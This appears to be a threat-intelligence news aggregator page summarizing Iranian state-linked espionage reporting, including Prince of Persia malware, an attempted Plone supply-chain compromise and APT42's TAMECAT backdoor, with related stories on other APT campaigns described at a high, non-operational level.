Iranian State-Linked Threat Activity and Related Supply-Chain/Developer Targeting Research
Multiple reports detail Iranian-linked espionage activity and tooling updates. SafeBreach described follow-on findings on the Iranian state-sponsored actor “Prince of Persia,” including at least three active variants of Foudre and Tonnerre malware, newly identified C2 infrastructure, and a Telegram-based data exfiltration channel; after publication, the actor rapidly rotated C2 servers and Telegram accounts, attempted to obscure victim-tracking artifacts, and appeared to attempt a retaliatory action against researchers that resembled prior attacks against open-source Python libraries.
Separately, Plone (a Python-based CMS) reported it prevented a supply-chain compromise after an attacker used a stolen developer GitHub personal access token to force-push whitespace-obfuscated malicious JavaScript into multiple repositories; the changes were detected before any official release, and GitHub assessed the payload was intended to compromise other developers (persistence via shell startup scripts, RCE, and theft of credentials/API keys/browser profiles/crypto wallet files). Additional Iranian activity was reported in an espionage campaign attributed to APT42 (IRGC-linked) using TAMECAT, a modular, largely in-memory PowerShell backdoor delivered after prolonged social engineering (e.g., WhatsApp rapport-building), with modules for browser data theft, screenshots, and file discovery; however, separate research on the Lazarus “Contagious Interview” campaign (fake job interviews and AnyDesk RAT backdoors) is unrelated to the Iranian-focused activity described elsewhere.
Related Entities
Threat Actors
Organizations
Affected Products
Sources
Related Stories
Iranian Threat Activity: RedKitten NGO Targeting and APT42 TAMECAT Credential Theft
Reporting describes two separate **Iran-linked espionage** efforts. HarfangLab detailed a campaign dubbed **RedKitten** targeting human-rights NGOs and individuals documenting abuses, using a lure delivered as a Farsi-named `7z` archive containing macro-enabled Excel (`.xlsm`) files. When victims enable the malicious VBA, it drops a C# implant (`AppVStreamingUX_Multi_User.dll`) via **AppDomainManager injection**; the operation uses **GitHub** and **Google Drive** for configuration/payload retrieval and **Telegram** for command-and-control, and researchers noted code characteristics consistent with **LLM-assisted** development. Separately, Pulsedive research (as summarized) attributed a PowerShell backdoor called **TAMECAT** to **APT42**, describing social-engineering via impersonated WhatsApp contacts and links abusing the `search-ms` URI handler, followed by VBScript-based staging and delivery mechanisms including WebDAV-hosted LNKs disguised as PDFs. TAMECAT was reported to steal credentials from **Microsoft Edge** and **Chrome**, establish persistence (e.g., logon scripts and registry run keys), and use multiple C2 channels (including **Telegram**, Discord, Firebase, and Cloudflare Workers). Other items in the set cover unrelated events: a supply-chain compromise of *eScan* antivirus update infrastructure distributing a backdoor, and Fortinet’s reporting on **Interlock** ransomware activity affecting primarily UK/US organizations (not Iran-linked).
1 months ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligning to geopolitical events; activity was traced to infrastructure linked to Iran-nexus actors using commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask origin, and the most targeted vendors were **Hikvision** and **Dahua**. Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity on multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, airport, non-profit, and the Israeli operations of a U.S. software supplier to defense/aerospace; Symantec identified a previously unknown backdoor dubbed **Dindoor** (leveraging the *Deno* runtime) and a Python backdoor **Fakeset**, with malware signed using certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and noted attempted data exfiltration using **Rclone** to a *Wasabi* cloud storage bucket. Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt. A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
6 days ago
Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. **Check Point** reported on **Silver Dragon**, a Chinese-aligned activity cluster assessed as operating under the broader **APT41** umbrella, targeting organizations in **Southeast Asia and Europe** (notably government) via exploitation of public-facing servers and phishing, then deploying **Cobalt Strike**, **DNS tunneling**, and a new Google Drive–based backdoor (**GearDoor**) alongside custom tools (**SSHcmd** and **SliverScreen**) for remote access and screen capture. **Microsoft** detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and **EV code-signed** malware (certificate issued to **TrustConnect Software PTY LTD**) masquerading as common workplace apps (e.g., `msteams.exe`, `adobereader.exe`, `zoomworkspace.clientsetup.exe`) to install legitimate **RMM** tooling (**ScreenConnect**, **Tactical RMM**, **Mesh Agent**) for persistent access and lateral movement. Other reporting highlighted additional, unrelated campaigns and tradecraft: **ClearSky** described a Russian-aligned operation targeting **Ukraine** using a phishing-delivered ZIP/HTA chain that drops a .NET loader (**BadPaw**) and backdoor (**MeowMeow**) with **.NET Reactor** obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to **APT28**). **Cofense**-reported activity (via SC Media) showed phishing that weaponizes **Windows File Explorer + WebDAV** using URL/LNK shortcuts to pull payloads (notably **AsyncRAT**, **XWorm**, **DcRAT**) and infrastructure including **Cloudflare Tunnel** domains hosting WebDAV servers. **Cisco Talos**-reported **Dohdoor** activity (UAT-10027) targeted US **education and healthcare**, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., `Fondue.exe`, `mblctr.exe`, `ScreenClippingHost.exe`) and **DNS-over-HTTPS** to Cloudflare for C2 discovery and tunneling. Separately, **Zscaler** reported **ScarCruft**’s *Ruby Jumper* campaign using **Zoho WorkDrive** for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed **Dust Specter** targeting Iraqi government officials with password-protected RAR delivery and modular implants. **Qianxin XLab** assessed sanctioned infrastructure provider **Funnull** resurfacing to support scam/criminal supply chains and potential **MacCMS**-related supply-chain activity, and **F5 Labs** summarized **APT42**’s **TAMECAT** PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
1 weeks ago